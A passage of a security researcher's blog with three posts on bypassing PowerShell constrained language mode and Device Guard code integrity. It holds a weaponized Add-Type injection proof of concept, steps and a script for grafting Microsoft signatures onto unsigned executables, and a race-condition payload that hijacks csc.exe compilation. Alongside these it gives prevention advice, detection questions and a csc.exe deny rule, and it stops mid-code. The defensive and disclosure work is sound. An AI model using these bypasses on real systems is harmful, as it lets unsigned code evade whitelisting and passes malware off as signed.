Tuesday, August 29, 2017

Exploiting PowerShell Code Injection Vulnerabilities to Bypass Constrained Language Mode

Introduction


Constrained language mode is an extremely effective method of preventing arbitrary unsigned code execution in PowerShell. Its most realistic enforcement scenarios are when Device Guard or AppLocker are in enforcement mode, because any script or module that is not approved per policy will be placed in constrained language mode, severely limiting an attacker's ability to execute unsigned code. Among the restrictions imposed by constrained language mode is the inability to call Add-Type. Restricting Add-Type makes sense considering it compiles and loads arbitrary C# code into your runspace. PowerShell code that is approved per policy, however, runs in "full language" mode, where execution of Add-Type is permitted. It turns out that Microsoft-signed PowerShell code calls Add-Type quite regularly. Don't believe me? Find out for yourself by running the following command:

ls C:\* -Recurse -Include '*.ps1', '*.psm1' |
  Select-String -Pattern 'Add-Type' |
  Sort Path -Unique |
  % { Get-AuthenticodeSignature -FilePath $_.Path } |
  ? { $_.SignerCertificate.Subject -match 'Microsoft' }

Exploitation


Now, imagine if the following PowerShell module code (pretend it’s called “VulnModule”) were signed by Microsoft:

$Global:Source = @'
public class Test {
    public static string PrintString(string inputString) {
        return inputString;
    }
}
'@

Add-Type -TypeDefinition $Global:Source

Any ideas on how you might influence the input to Add-Type from constrained language mode? Take a minute to think about it before reading on.

Alright, let’s think the process through together:
  1. Add-Type is passed a global variable as its type definition. Because it’s global, its scope is accessible by anyone, including us, the attacker.
  2. The issue, though, is that the signed code defines the global variable immediately prior to calling Add-Type, so even if we supplied our own malicious C# code, it would just be overwritten by the legitimate code.
  3. Did you know that you can set read-only variables using the Set-Variable cmdlet? Do you know what I’m thinking now?

Weaponization


Okay, so to inject code into Add-Type from constrained language mode, an attacker needs to define their malicious code as a read-only variable, preventing the signed code from setting the global "Source" variable. Here's a weaponized proof of concept:

Set-Variable -Name Source -Scope Global -Option ReadOnly -Value @'
public class Injected {
    public static string ToString(string inputString) {
        return inputString;
    }
}
'@

Import-Module VulnModule

[Injected]::ToString('Injected!!!')

A quick note about weaponization strategies for Add-Type injection flaws. One of the restrictions of constrained language mode is that you cannot call .NET methods on non-whitelisted classes with two exceptions: properties (which is just a special “getter” method) and the ToString method. In the above weaponized PoC, I chose to implement a static ToString method because ToString permits me to pass arguments (a property getter does not). I also made my class static because the .NET class whitelist only applies when instantiating objects with New-Object.

So did the above vulnerable example sound contrived and unrealistic? You would think so, but Microsoft.PowerShell.ODataAdapter.ps1 within the Microsoft.PowerShell.ODataUtils module was actually vulnerable to this exact issue. Microsoft fixed the issue in either CVE-2017-0215, CVE-2017-0216, or CVE-2017-0219. I can't remember, to be honest. Matt Nelson and I reported a bunch of these injection bugs that were serviced by the awesome PowerShell team.

Prevention


The easiest way to prevent this class of injection attack is to supply a single-quoted here-string directly to -TypeDefinition in Add-Type. A single-quoted here-string will not expand any embedded variables or expressions. Of course, this scenario assumes that you are compiling static code. If you must supply dynamically generated code to Add-Type, be exceptionally mindful of how an attacker might influence its input. To get a sense of a subset of ways to influence code execution in PowerShell, watch my "Defensive Coding Strategies for a High-Security Environment" talk that I gave at PSConf.EU.
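
To make the distinction concrete, here is a minimal sketch contrasting the vulnerable pattern from VulnModule with the hardened form (the C# is the same toy type used earlier):

# Vulnerable pattern: the type definition comes from a variable an attacker may
# be able to pre-stage (e.g. a read-only global variable).
Add-Type -TypeDefinition $Global:Source

# Safer pattern: supply static C# directly as a single-quoted here-string so
# nothing is expanded and there is no intermediate variable to hijack.
Add-Type -TypeDefinition @'
public class Test {
    public static string PrintString(string inputString) {
        return inputString;
    }
}
'@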

Mitigation


While Microsoft will certainly service these vulnerabilities moving forward, what is to prevent an attacker from bringing the vulnerable version along with them?

A surprisingly effective blacklist rule for UMCI bypass binaries is the FileName rule, which blocks execution based on the filename present in the OriginalFilename field within the "Version Info" resource in a PE. A PowerShell script is obviously not a PE file though - it's a text file - so the FileName rule won't apply. Instead, you are forced to block the vulnerable script by its file hash using a Hash rule. Okay… what if there is more than a single vulnerable version of the same script? You've only blocked a single hash thus far. Are you starting to see the problem? In order to effectively block all previous vulnerable versions of the script, you must know the hashes of all vulnerable versions. Microsoft certainly recognizes that problem and has made a best effort (considering they are the ones with the resources) to scan all previous Windows releases for vulnerable scripts, collect the hashes, and incorporate them into a blacklist here. Considering the challenges involved in blocking all versions of all vulnerable scripts by their hash, it is certainly possible that some might fall through the cracks. This is why it is still imperative to only permit execution of PowerShell version 5 and to enable scriptblock logging. Lee Holmes has an excellent post on how to effectively block older versions of PowerShell in his blog post here.

Another way in which a defender might get lucky regarding vulnerable PowerShell script blocking is that most scripts and binaries on the system are catalog signed rather than Authenticode signed. Catalog signed means that rather than the script having an embedded Authenticode signature, its hash is stored in a catalog file that is signed by Microsoft. So as Microsoft ships updates, hashes for old versions will eventually fall out of the catalog store and no longer remain "signed." Now, an attacker could presumably also bring an old, signed catalog file with them and insert it into the catalog store. You would have to be elevated to perform that action though, and by that point, there are a multitude of other ways to bypass Device Guard UMCI. As a researcher seeking out such vulnerable scripts, it is ideal to first seek out potentially vulnerable scripts that have an embedded Authenticode signature, as indicated by the presence of the following string: "SIG # Begin signature block". Such bypass scripts exist. Just ask Matt Nelson.
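
If you want to hunt for such candidates yourself, a sweep along the lines of the earlier one-liner works (paths and filters are illustrative):

# Enumerate PowerShell scripts/modules that carry an embedded Authenticode
# signature block rather than relying solely on a catalog entry.
ls C:\* -Recurse -Include '*.ps1', '*.psm1' -ErrorAction SilentlyContinue |
  Select-String -Pattern 'SIG # Begin signature block' -SimpleMatch -List |
  Select-Object -ExpandProperty Path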

Reporting


If you find a bypass, report it to secure@microsoft.com and earn yourself a CVE. The PowerShell team actively addresses injection flaws, and they are also taking proactive steps to mitigate many of the primitives used to influence code execution in these classes of bug.

Conclusion


While constrained language mode remains an extremely effective means of preventing unsigned code execution, PowerShell and its library of signed modules/scripts remain a large attack surface. I encourage everyone to seek out more injection vulns, report them, earn credit via formal MSRC acknowledgements, and make the PowerShell ecosystem a more secure place. And hopefully, as a writer of PowerShell code, you'll find yourself thinking more often about how an attacker might be able to influence the execution of your code.

Now, everything that I just explained is great, but it turns out that any call to Add-Type remains vulnerable to injection due to a design issue that permits exploiting a race condition. I really hope that by continuing to shed light on these issues, Microsoft will consider addressing this fundamental issue.

Monday, August 28, 2017

Application of Authenticode Signatures to Unsigned Code

Attackers have been known to apply legitimate digital certificates to their malware, presumably to evade basic signature validation utilities. This was the case with the Petya ransomware. As a reverse engineer or red team capability developer, it is important to know the methods by which legitimate signatures can be applied to otherwise unsigned, attacker-supplied code. This blog post will give some background on code signing mechanisms, digital signature binary formats, and finally, techniques for applying digital signatures to an unsigned PE file. Soon, you will also see why these techniques are even more relevant in research that I will be releasing next month.

Background


What does it mean for a PE file (exe, dll, sys, etc.) to be signed? The simple answer for many is to open the file properties of a PE; if a "Digital Signatures" tab is present, the file was signed. When you see that the "Digital Signatures" tab is present on a file, it actually means that the PE file was Authenticode signed, meaning that within the file itself there is a binary blob of data consisting of a certificate and a signed hash of the file (more specifically, the Authenticode hash, which doesn't consider certain parts of the PE header in the hash calculation). The format in which an Authenticode signature is stored is documented in the PE Authenticode specification.


Many files that one would expect to be signed, however (for example, consider notepad.exe), do not have a "Digital Signatures" tab. Does this mean that the file isn't signed and that Microsoft is actually shipping unsigned code? Well, it depends. While notepad.exe does not have an Authenticode signature embedded within itself, in reality, it was signed via another means - catalog signing. Windows contains a catalog store consisting of many catalog files that are basically just lists of Authenticode hashes. Each catalog file is then signed to attest that any files with matching hashes originated from the signer of the catalog file (which is Microsoft in almost all cases). So while the Explorer UI does not attempt to look up catalog signatures, pretty much any other signature verification tool will perform catalog lookups - e.g. Get-AuthenticodeSignature in PowerShell and Sysinternals Sigcheck.

Note: The catalog file store is located in %windir%\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}
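
A command along these lines displays the properties discussed below (output will vary by Windows build):

# SignatureType reports "Catalog" for catalog-signed files like notepad.exe, and
# IsOSBinary is True when the chain terminates in a known Microsoft root.
Get-AuthenticodeSignature -FilePath C:\Windows\System32\notepad.exe |
  Format-List Path, Status, SignatureType, IsOSBinary, SignerCertificate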



In the above screenshot, the SignatureType property indicates that notepad.exe is catalog signed. What is also worth noting is the IsOSBinary property. While the implementation is not documented, this will show “True” if a signature chains to one of several known, hashed Microsoft root certificates. Those interested in learning more about how this works should reverse the CertVerifyCertificateChainPolicy function.

Sigcheck with the “-i” switch will perform catalog certificate validation and also display the catalog file path that contains the matching Authenticode hash. The “-h” switch will also calculate and display the SHA1 and SHA256 Authenticode hashes of the PE file (PESHA1 and PE256, respectively):

sigcheck -q -h -i C:\Windows\System32\notepad.exe
c:\windows\system32\notepad.exe:
  Verified:       Signed
  Catalog:        C:\WINDOWS\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-shell~31bf3856ad364e35~amd64~~10.0.15063.0.cat
  Signers:
    Microsoft Windows
      Status:         Valid
      Valid Usage:    NT5 Crypto, Code Signing
      Serial Number:  33 00 00 01 06 6E C3 25 C4 31 C9 18 0E 00 00 00 00 01 06
      Thumbprint:     AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033
      Algorithm:      1.2.840.113549.1.1.11
      Valid from:     1:39 PM 10/11/2016
      Valid to:       1:39 PM 1/11/2018
    Microsoft Windows Production PCA 2011
      Status:         Valid
      Valid Usage:    All
      Serial Number:  61 07 76 56 00 00 00 00 00 08
      Thumbprint:     580A6F4CC4E4B669B9EBDC1B2B3E087B80D0678D
      Algorithm:      1.2.840.113549.1.1.11
      Valid from:     11:41 AM 10/19/2011
      Valid to:       11:51 AM 10/19/2026
    Microsoft Root Certificate Authority 2010
      Status:         Valid
      Valid Usage:    All
      Serial Number:  28 CC 3A 25 BF BA 44 AC 44 9A 9B 58 6B 43 39 AA
      Thumbprint:     3B1EFD3A66EA28B16697394703A72CA340A05BD5
      Algorithm:      1.2.840.113549.1.1.11
      Valid from:     2:57 PM 6/23/2010
      Valid to:       3:04 PM 6/23/2035
    Signing date:   1:02 PM 3/18/2017
    Counter Signers:
      Microsoft Time-Stamp Service
        Status:         Valid
        Valid Usage:    Timestamp Signing
        Serial Number:  33 00 00 00 B3 39 BB D4 12 93 15 A9 FE 00 00 00 00 00 B3
        Thumbprint:     BEF9C1F4DA0F153FF0900303BE78A59ADA8ADCB9
        Algorithm:      1.2.840.113549.1.1.11
        Valid from:     10:56 AM 9/7/2016
        Valid to:       10:56 AM 9/7/2018
      Microsoft Time-Stamp PCA 2010
        Status:         Valid
        Valid Usage:    All
        Serial Number:  61 09 81 2A 00 00 00 00 00 02
        Thumbprint:     2AA752FE64C49ABE82913C463529CF10FF2F04EE
        Algorithm:      1.2.840.113549.1.1.11
        Valid from:     2:36 PM 7/1/2010
        Valid to:       2:46 PM 7/1/2025
      Microsoft Root Certificate Authority 2010
        Status:         Valid
        Valid Usage:    All
        Serial Number:  28 CC 3A 25 BF BA 44 AC 44 9A 9B 58 6B 43 39 AA
        Thumbprint:     3B1EFD3A66EA28B16697394703A72CA340A05BD5
        Algorithm:      1.2.840.113549.1.1.11
        Valid from:     2:57 PM 6/23/2010
        Valid to:       3:04 PM 6/23/2035
    Publisher:      Microsoft Windows
    Description:    Notepad
    Product:        Microsoft® Windows® Operating System
    Prod version:   10.0.15063.0
    File version:   10.0.15063.0 (WinBuild.160101.0800)
    MachineType:    64-bit
    MD5:    F60A9D3A9461F68DE0FCCEBB0C6CB31A
    SHA1:   2302BA58181F3C4E1E44A47A7D214EE9397CF2BA
    PESHA1: ACCE8ADCE9DDDE507EAE295DBB37683CA272DB9E
    PE256:  0C67E3923EDA8154A89ADCA8A6BF47DF7C07D40BB41963DEB16ACBCF2E54803E
    SHA256: C84C361B7F5DBAEAC93828E60D2B54704D3E7CA84148BAFDA632F9AD6CDC96FA
    IMP:    645E8D8B0AEA808FF16DAA70D6EE720E

Knowing the Authenticode hash allows you to look up the respective entry in the catalog file. You can double-click a catalog file to view its entries. I also wrote the CatalogTools PowerShell module to parse catalog files. The “hint” metadata field gives away that notepad.exe is indeed the corresponding entry:


Digital Signature Binary Format


Now that you have an understanding of the methods in which a PE file can be signed (Authenticode and catalog), it is useful to have some background on the binary format of signatures. Whether Authenticode signed or catalog signed, both signatures are stored as PKCS #7 signed data which is ASN.1 formatted binary data. ASN.1 is simply a standard that states how binary data of different data types should be stored. Before observing/parsing the bytes of a digital signature, you must first know how it is stored in the file. Catalog files are straightforward as the file itself consists of raw PKCS #7 data. There are online ASN.1 decoders that parse out ASN.1 data and present it in an intuitive fashion. For example, try loading the catalog file containing the hash for notepad.exe into the decoder and you will get a sense of the layout of the data. Here’s a snippet of the parsed output:


Each property within the ASN.1 encoded data begins with an object identifier (OID) - a unique numeric sequence that identifies the type of data that follows. The OIDs worth noting in the above snippet are the following:
  1. 1.2.840.113549.1.7.2 - This indicates that what follows is PKCS #7 signed data - the format expected for Authenticode and catalog-signed code.
  2. 1.3.6.1.4.1.311.12.1.1 - This indicates that what follows is catalog file hash data
It is worth spending time exploring all of the fields contained within a digital signature. Describing every field, however, is outside the scope of this blog post. Additional crypto/signature-related OIDs are listed here.
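
If you'd rather not upload a catalog file to an online decoder, certutil can dump the same ASN.1 structure locally (the catalog path below is the one resolved for notepad.exe earlier and will differ across builds):

# Dump the raw ASN.1 structure of a catalog file; look for the OIDs noted above.
certutil -asn 'C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-shell~31bf3856ad364e35~amd64~~10.0.15063.0.cat'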

Embedded PE Authenticode Signature Retrieval


The digital signature data in a PE file with an embedded Authenticode signature is appended to the end of the file (in a well-formatted PE file). The OS obviously needs a little bit more information than that though in order to retrieve the exact offset and size of the embedded signature. Let’s look at kernel32.dll in one of my favorite PE parsing/editing utilities: CFF Explorer.


The offset and size of the embedded digital signature are stored in the "security directory" entry within the "data directories" array in the optional header. The data directory contains the offsets and sizes of various structures within the PE file - exports, imports, relocations, etc. All offsets within the data directory are relative virtual addresses (RVAs), meaning they are offsets to the respective portion of the PE when loaded in memory. There is one exception though - the security directory, which stores its offset as a file offset. The reason is that the Windows loader doesn't actually load the contents of the security directory into memory.
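
As a rough sketch of what CFF Explorer is showing here, the security directory entry can be read with a few lines of PowerShell (minimal parsing, no validation; the target path is just an example):

# Locate the security directory entry of a PE and print the file offset and
# size of its embedded WIN_CERTIFICATE structure.
$Path  = "$env:windir\System32\kernel32.dll"
$Bytes = [IO.File]::ReadAllBytes($Path)

$e_lfanew = [BitConverter]::ToInt32($Bytes, 0x3C)        # Offset of the 'PE\0\0' signature
$OptionalHeaderOffset = $e_lfanew + 4 + 20               # Skip the signature and IMAGE_FILE_HEADER
$Magic = [BitConverter]::ToUInt16($Bytes, $OptionalHeaderOffset)

# Data directories begin 96 bytes (PE32) or 112 bytes (PE32+) into the optional
# header; the security directory is index 4 and each entry is 8 bytes.
$DataDirectoryOffset = $OptionalHeaderOffset + $(if ($Magic -eq 0x20B) { 112 } else { 96 })
$SecurityDirOffset   = $DataDirectoryOffset + (4 * 8)

# Unlike every other directory entry, this "VirtualAddress" is a file offset.
$CertOffset = [BitConverter]::ToUInt32($Bytes, $SecurityDirOffset)
$CertSize   = [BitConverter]::ToUInt32($Bytes, $SecurityDirOffset + 4)

'WIN_CERTIFICATE file offset: 0x{0:X8}  Size: 0x{1:X8}' -f $CertOffset, $CertSize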

The binary data at the security directory file offset is a WIN_CERTIFICATE structure. Here's what the structure for kernel32.dll looks like parsed out in 010 Editor (file offset 0x000A9600):


PE Authenticode signatures should always have a wCertificateType of WIN_CERT_TYPE_PKCS_SIGNED_DATA. The bCertificate byte array that follows is the same PKCS #7, ASN.1 encoded signed data as was seen in the contents of a catalog file. The only difference is that you shouldn't find the 1.3.6.1.4.1.311.12.1.1 OID, which would indicate the presence of catalog hashes.

Parsing out the raw bCertificate data in the online ASN.1 decoder confirms we’re dealing with proper PKCS #7 data:

Application of Digital Signatures to Unsigned PEs


Now that you have a basic idea of the binary format and storage locations of digital signatures, you can start applying existing signatures to your unsigned code.

Application of Embedded Authenticode Signatures


Applying an embedded Authenticode signature from a signed file to an unsigned PE file is quite straightforward. While the process can obviously be automated, I’m going to explain how to do it manually with a hex editor and CFF Explorer.

Step #1: Identify the Authenticode signature that you want to steal. In this example, I will use the one in kernel32.dll

Step #2: Identify the offset and size of the WIN_CERTIFICATE structure in the “security directory”


So the file offset in the above screenshot is 0x000A9600 and the size is 0x00003A68.

Step #3: Open kernel32.dll in a hex editor, select 0x3A68 bytes starting at offset 0xA9600, and then copy the bytes.


Step #4: Open your unsigned PE (HelloWorld.exe in this example) in a hex editor, scroll to the end, and paste the bytes copied from kernel32.dll. Take note of the file offset of the beginning of the signature (0x00000E00 in my case). Save the file after pasting in the signature.


Step #5: Open HelloWorld.exe in CFF Explorer and update the security directory to point to the digital signature that was applied: offset - 0x00000E00, size - 0x00003A68. Save the file after making the modifications. Ignore the “Invalid” warning. CFF Explorer doesn’t treat the security directory as a file offset and gets confused when it tries to reference what section the data resides in.


That's it! Now, signature validation utilities will parse and display the signature properly. The only caveat is that they will report the signature as invalid because the calculated Authenticode hash of the file does not match the signed hash stored in the signature.

Now, if you were wondering why the SignerCertificate thumbprint values don’t match, then you are an astute reader. Considering we applied the identical signature, why doesn’t the certificate thumbprint match? That’s because Get-AuthenticodeSignature first attempts a catalog file lookup of kernel32.dll. In this case, it found a catalog entry for kernel32.dll and is displaying the signature information for the signer of the catalog file. kernel32.dll is also Authenticode signed though. To validate that the thumbprint values for the Authenticode hashes are identical, temporarily stop the CryptSvc service - the service responsible for performing catalog hash lookups. Now you will see that the thumbprint values match. This indicates that the catalog hash was signed with a different code signing certificate from the certificate used to sign kernel32.dll itself.
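
A quick sketch of that comparison (run from an elevated prompt; HelloWorld.exe is the unsigned PE from the steps above):

# With CryptSvc running, kernel32.dll resolves to its catalog signer. With the
# service stopped, only embedded Authenticode signatures are considered and the
# two thumbprints should match. Stopping CryptSvc may require -Force if other
# services depend on it.
$Files = 'C:\Windows\System32\kernel32.dll', '.\HelloWorld.exe'

Get-AuthenticodeSignature -FilePath $Files |
  Format-Table Path, Status, @{ Label = 'Thumbprint'; Expression = { $_.SignerCertificate.Thumbprint } }

Stop-Service -Name CryptSvc        # Temporarily disable catalog hash lookups

Get-AuthenticodeSignature -FilePath $Files |
  Format-Table Path, Status, @{ Label = 'Thumbprint'; Expression = { $_.SignerCertificate.Thumbprint } }

Start-Service -Name CryptSvc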

Application of a Catalog Signature to a PE File


Realistically, CryptSvc will always be running and catalog lookups will be performed. Suppose you want to be mindful of OPSEC and match the identical certificate used to sign your target binary. It turns out, you can actually apply the contents of a catalog file to an embedded PE signature by swapping out the contents of bCertificate in the WIN_CERTIFICATE structure and updating dwLength accordingly. Feel free to follow along as this is done. Note that our goal (in this case) is to apply an Authenticode signature to our unsigned binary that is identical to the one used to sign the containing catalog file: Certificate thumbprint AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033 in this case.

Step #1: Identify the catalog file containing the Authenticode hash of the target binary - kernel32.dll in this case. If a file is Authenticode signed, sigcheck will actually fail to resolve the catalog file. Signtool (included in the Windows SDK) will, however.
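
For example (the all-methods and verbose switches shown are standard signtool options; output formatting varies by SDK version):

# signtool's verbose output includes the catalog file containing the matching
# Authenticode hash for a catalog-signed file.
signtool verify /a /v C:\Windows\System32\kernel32.dll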


Step #2: Open the catalog file in a hex editor and note the file size - 0x000137C7


Step #3: We’re going to manually craft a WIN_CERTIFICATE structure in a hex editor. Let’s go through each field we’ll supply:
  1. dwLength: This is the total length of the WIN_CERTIFICATE structure - i.e. bCertificate bytes plus the size of the other fields = 4 (size of DWORD) + 2 (size of WORD) + 2 (size of WORD) + 0x000137C7 (bCertificate - the file size of the .cat file) = 0x000137CF.
  2. wRevision: This will be 0x0200 to indicate WIN_CERT_REVISION_2_0.
  3. wCertificateType: This will be 0x0002 to indicate WIN_CERT_TYPE_PKCS_SIGNED_DATA.
  4. bCertificate: This will consist of the raw bytes of the catalog file.
When crafting the bytes in the hex editor, be mindful that the fields are stored in little-endian format.
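
A sketch of that arithmetic in PowerShell (the catalog path is a placeholder; the output file is the raw blob to paste into the unsigned PE):

# Craft a WIN_CERTIFICATE header for a catalog file and prepend it to the
# catalog bytes. BitConverter emits little-endian values on x86/x64.
$CatBytes = [IO.File]::ReadAllBytes('C:\path\to\target.cat')      # placeholder path

$dwLength = 4 + 2 + 2 + $CatBytes.Length                          # header fields + bCertificate
$Header = New-Object byte[] 8
[BitConverter]::GetBytes([UInt32] $dwLength).CopyTo($Header, 0)   # dwLength
[BitConverter]::GetBytes([UInt16] 0x0200).CopyTo($Header, 4)      # wRevision: WIN_CERT_REVISION_2_0
[BitConverter]::GetBytes([UInt16] 0x0002).CopyTo($Header, 6)      # wCertificateType: WIN_CERT_TYPE_PKCS_SIGNED_DATA

[IO.File]::WriteAllBytes("$PWD\win_certificate.bin", [byte[]] ($Header + $CatBytes))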


Step #4: Copy all the bytes from the crafted WIN_CERTIFICATE structure, append them to your unsigned PE, and update the security directory offset and size accordingly.


Now, assuming your calculations and alignments were proper, behold a thumbprint match with that of the catalog file!


Anomaly Detection Ideas


The techniques presented in this blog post have hopefully gotten some people thinking about how one might go about detecting the abuse of digital signatures. While I have not investigated signature heuristics thoroughly, let me pose a series of questions that might motivate others to start investigating and writing detections for potential signature anomalies:
  • For a legitimately signed Microsoft PE, is there any correlation between the PE timestamp and the certificate validity period? Would the PE timestamp for attacker-supplied code deviate from the aforementioned correlation?
  • After reading this article, what is your level of trust in a “signed” file that has a hash mismatch?
  • How would you go about detecting a PE file that has an embedded Authenticode signature consisting of a catalog file? Hint: A specific OID mentioned earlier might be useful.
  • How might you go about validating the signature of a catalog-signed file on a different system?
  • What effect might a stopped/disabled CryptSvc service have on security products performing local signature validation? If that were to occur, most system files would, for all intents and purposes, cease to be signed.
  • Every legitimate PE I’ve seen is padded on a 0x10 byte boundary. The example I showed where I applied the catalog contents to an Authenticode signature is not 0x10 byte aligned.
  • How might you differentiate between a legitimate Microsoft digital signature and one where all the certificate attributes are applied to a self-signed certificate?
  • What if there is data appended beyond the digital signature? This has been abused in the past.
  • Threat intel professionals should find the Authenticode hash to be an interesting data point when investigating identical code with different certificates applied. VirusTotal supplies this as the "Authentihash" value: i.e. the hash value that was calculated with "sigcheck -h". If I were investigating variants of a sample that had more than one hit on a single Authentihash in VirusTotal, I would find that to be very interesting.

Monday, July 10, 2017

Bypassing Device Guard with .NET Assembly Compilation Methods

Tl;dr

This post will describe a Device Guard user mode code integrity (UMCI) bypass (or a bypass of any other application whitelisting solution, for that matter) that takes advantage of the fact that code integrity checks are not performed on any code that compiles C# dynamically with csc.exe. This issue was reported to Microsoft on November 14, 2016. Despite all other Device Guard bypasses being serviced, a decision was made not to service this bypass. This bypass can be mitigated by blocking csc.exe, but that may not be realistic in your environment considering the frequency with which legitimate code makes use of these methods - e.g. msbuild.exe and many PowerShell modules that call Add-Type.

Introduction

When Device Guard enforces user mode code integrity (UMCI), aside from blocking non-whitelisted binaries, it also only permits the execution of signed scripts (PowerShell and WSH) approved per policy. The UMCI enforcement mechanism in PowerShell is constrained language mode. One of the features of constrained language mode is that unsigned/unapproved scripts are prevented from calling Add-Type, as this would permit arbitrary code execution via the compilation and loading of supplied C#. Scripts that are approved per Device Guard code integrity (CI) policy, however, are under no such restrictions, execute in full language mode, and are permitted to call Add-Type. While investigating Device Guard bypasses, I considered targeting legitimate, approved calls to Add-Type. I knew that the act of calling Add-Type caused csc.exe (the C# compiler) to drop a .cs file to %TEMP%, compile it, and load it. A procmon trace of PowerShell calling Add-Type confirms this:

Process Name Operation  Path
------------ ---------  ----
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.cmdline
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.0.cs
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
cvtres.exe   CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
cvtres.exe   CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.dll
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP

Upon seeing these files created, I asked myself the following questions:
  1. Considering an approved (i.e. whitelisted per policy) PowerShell function is permitted to call Add-Type (as many Microsoft-signed module functions do), could I possibly replace the dropped .cs file with my own? Could I do so quickly enough to win that race?
  2. How is the .DLL that’s created loaded? Is it subject to code integrity (CI) checks?

Research methodology

Let's start with the second question since exploitation would be impossible if CI prevented the loading of a hijacked, unsigned DLL. To answer this question, I needed to determine which .NET methods were called when Add-Type is invoked. This determination was relatively easy by tracing method calls in dnSpy, and I quickly traced execution through the relevant .NET methods.
Once the Microsoft.CSharp.CSharpCodeGenerator.Compile method is called, csc.exe is ultimately invoked. After the Compile method returns, FromFileBatch takes the compiled artifacts, reads them in as a byte array, and then loads them using System.Reflection.Assembly.Load(byte[], byte[], Evidence). This is the same method called by msbuild.exe when compiling inline tasks - a known Device Guard UMCI bypass discovered by Casey Smith. Knowing this, I gained confidence that if I could hijack the dropped .cs file, I would end up with a constrained language mode bypass allowing arbitrary unsigned code execution. What we're referring to here is known as a "time of check, time of use" (TOCTOU) attack. If I could manage to replace the dropped .cs file with my own prior to csc.exe consuming it, then I would win the race and achieve the bypass. The only constraint imposed on me, however, was that I would need to write the hijack payload within the confines of constrained language mode. As it turns out, I was successful.
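
To illustrate the load primitive at play, here is its PowerShell equivalent (with a placeholder path; this is not the FromFileBatch code itself):

# A byte-array assembly load has no backing file by the time it executes, which
# is why it sidesteps code integrity checks and traditional module load telemetry.
$AssemblyBytes = [IO.File]::ReadAllBytes('C:\path\to\compiled.dll')   # placeholder
$LoadedAssembly = [System.Reflection.Assembly]::Load($AssemblyBytes)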

Exploitation

I wrote a function called Add-TypeRaceCondition that will accept attacker-supplied C# and get an allowed call to Add-Type to compile it and load it within the constraints of constrained language mode. The weaponized bypass is roughly broken down as follows:
  1. Spawn a child process of PowerShell that constantly tries to drop the malicious .cs file to %TEMP%.
  2. Maximize the process priority of the child PowerShell process to increase the likelihood of winning the race.
  3. In the parent PowerShell process, import a Microsoft-signed PowerShell module that calls Add-Type - I chose the PSDiagnostics module for this.
  4. Kill the child PowerShell process.
  5. At this point, you will have likely won the race and your type will be loaded in place of the legitimate one expected by PSDiagnostics.
In reality, the payload wins the race a little more than 50% of the time. If Add-TypeRaceCondition doesn’t work on the first try, it will almost always work on the second try.
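
For those curious what the core of such a payload looks like, here is a rough sketch of the race (this is not the actual Add-TypeRaceCondition implementation; file names are illustrative, and some details, such as setting process priority, may need adjusting to stay within constrained language mode):

# Child process: loop as fast as possible, overwriting any .cs file that
# csc.exe drops to %TEMP% with attacker-controlled C#.
$MaliciousCS = 'public class Hijacked { public static string ToString(string s) { return s; } }'

$RacerScript = @"
while (`$true) {
    Get-ChildItem -Path `$env:TEMP -Filter *.cs -ErrorAction SilentlyContinue |
        ForEach-Object { Set-Content -LiteralPath `$_.FullName -Value '$MaliciousCS' -ErrorAction SilentlyContinue }
}
"@

$RacerPath = Join-Path $env:TEMP 'racer.ps1'
Set-Content -Path $RacerPath -Value $RacerScript

$Racer = Start-Process -FilePath powershell -ArgumentList '-NoProfile', '-File', $RacerPath -PassThru -WindowStyle Hidden
$Racer.PriorityClass = 'High'        # Boost priority to improve the odds of winning the race

Import-Module PSDiagnostics -Force   # Microsoft-signed module whose import calls Add-Type

Stop-Process -Id $Racer.Id -Force    # Kill the racer once the signed Add-Type call has fired
Remove-Item -Path $RacerPath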

Do note that while I weaponized this bypass for PowerShell, this can be weaponized using anything that would allow you to overwrite the dropped .cs file quickly enough. I've weaponized the bypass using a batch script, VBScript, and with WMI. I'll leave it up to the reader to implement a bypass using their language of choice.

Operational Considerations

It's worth noting that while an application whitelisting bypass is just that, it also serves as a method of code execution that is likely to evade defenses. In this bypass, an attacker need only drop a C# file to disk which results in the temporary creation of a DLL on disk which is quickly deleted. Depending upon the payload used, some anti-virus solutions with real-time scanning enabled could potentially have the ability to quarantine the dropped DLL before it's consumed by System.Reflection.Assembly.Load.

Prevention

Let me first emphasize that this is a .NET issue, not a PowerShell issue. PowerShell was simply chosen as a convenient means to weaponize the bypass. As I’ve already stated, this issue doesn’t just apply to when PowerShell calls Add-Type, but when any application calls any of the CodeDomProvider.CompileAssemblyFrom methods. Researchers will continue to target signed applications that make such method calls until this issue is mitigated.

A possible user mitigation for this bypass would be to block csc.exe with a Device Guard rule. I would personally advise against this, however, since there are many legitimate Add-Type calls in PowerShell and presumably in other legitimate applications. I’ve provided a sample Device Guard CI rule that you can merge into your policy if you like though. I created the rule with the following code:

# Copy csc.exe into the following directory
# csc.exe should be the only file in this directory.
$CSCTestPath = '.\Desktop\ToBlock\'
$PEInfo = Get-SystemDriver -ScanPath $CSCTestPath -UserPEs -NoShadowCopy

$DenyRule = New-CIPolicyRule -Level FileName -DriverFiles $PEInfo -Deny
$DenyRule[0].SetAttribute('MinimumFileVersion', '65535.65535.65535.65535')

$CIArgs = @{
    FilePath = "$($CSCTestPath)block_csc.xml"
